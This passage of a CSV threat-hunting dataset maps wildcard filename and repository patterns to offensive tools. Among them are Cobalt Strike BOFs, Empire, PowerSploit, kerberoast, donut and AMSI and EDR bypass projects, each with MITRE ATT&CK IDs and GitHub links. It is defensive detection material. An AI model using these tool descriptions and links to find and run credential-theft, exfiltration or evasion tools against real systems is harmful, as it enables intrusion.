-*Test-ContainsAmsiPSTokenSignatures -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z
-*Test-DllExists*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,0,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Test-DllExists*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*tester@egress-assess.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*testHeapOverflow.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*Test-HijackableDll*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*testing* testing* 1* 2* 3 *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*Test-ServiceDaclPermission*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Test-ServiceDaclPermission*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Test-ServiceDaclPermission*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*TestWinRMMachines*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z
-*tevora-threat/SharpView/*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z
-*text_to_shellcode\*.exe*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,0,N/A,N/A,,N/A,,,
-*TexttoExe.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z
-*tezos2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*tgscrack.go*,offensive_tool_keyword,ASREPRoast,Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ,T1558.003,TA0006,N/A,N/A,Credential Access,https://github.com/HarmJ0y/ASREPRoast,1,1,N/A,N/A,2,180,57,2018-09-25T03:26:00Z,2017-01-14T21:07:57Z
-*tgsrepcrack.*,offensive_tool_keyword,AD exploitation cheat sheet,Crack with TGSRepCrack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*tgsrepcrack.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z
-*TGSThief-main*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z
-*tgtdelegation *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtdelegation.cna*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtdelegation.x64*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtdelegation.x86*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*tgtParse.py *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z 
-*th3rd/heroinn*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*TH3xACE/EDR-Test*,offensive_tool_keyword,EDR-Test,Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/TH3xACE/EDR-Test,1,1,N/A,N/A,2,140,19,2023-03-27T11:39:32Z,2022-03-27T08:58:49Z -*thc-hydra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*thc-hydra.git*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*thc-hydra.git*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*the-backdoor-factory-master*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*TheD1rkMtr/AMSI_patch*,offensive_tool_keyword,AMSI_patch,Patching AmsiOpenSession by forcing an error branching,T1055 - T1055.001 - T1112,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/AMSI_patch,1,1,N/A,8,2,126,27,2023-08-02T02:27:00Z,2023-02-03T18:11:37Z -*TheD1rkMtr/D1rkInject*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*TheD1rkMtr/DocPlz*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*TheD1rkMtr/GithubC2*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,1,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*TheD1rkMtr/HeapCrypt*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*TheD1rkMtr/NTDLLReflection*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*TheD1rkMtr/Pspersist*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - 
T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,1,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*TheD1rkMtr/Shellcode-Hide*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*TheD1rkMtr/StackCrypt*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*TheD1rkMtr/UnhookingPatch*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*TheGejr/SpringShell*,offensive_tool_keyword,Spring4Shell,Spring4Shell Proof Of Concept/Information CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/TheGejr/SpringShell,1,1,N/A,N/A,2,124,86,2022-04-04T14:09:11Z,2022-03-30T17:05:46Z -*theHarvester*,offensive_tool_keyword,theHarvester,E-mails. 
subdomains and names Harvester.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/laramies/theHarvester,1,0,N/A,N/A,10,9250,1843,2023-10-02T22:12:14Z,2011-01-01T20:40:15Z -*thelinuxchoice/tweetshell*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*ThemeBleed.exe *,offensive_tool_keyword,themebleed,Proof-of-Concept for CVE-2023-38146,T1566.001 - T1077 - T1213.002,TA0007 - TA0011 - TA0010,N/A,N/A,Exploitation tools,https://github.com/gabe-k/themebleed,1,0,N/A,10,2,143,27,2023-09-13T04:50:29Z,2023-09-13T04:00:14Z -*ThePorgs/Exegol-images*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*therealwover@protonmail.com*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*thewover/donut*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*thief.py -*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*third_party/SharpGen*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*third-party*winvnc*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in 
a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*thisisateststringdontcatchme*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*ThisIsNotRat-main*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,1,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*thoth.py -*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z 
-*thoth-master.zip*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*Thread_Hiijack_Inject_Load.*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 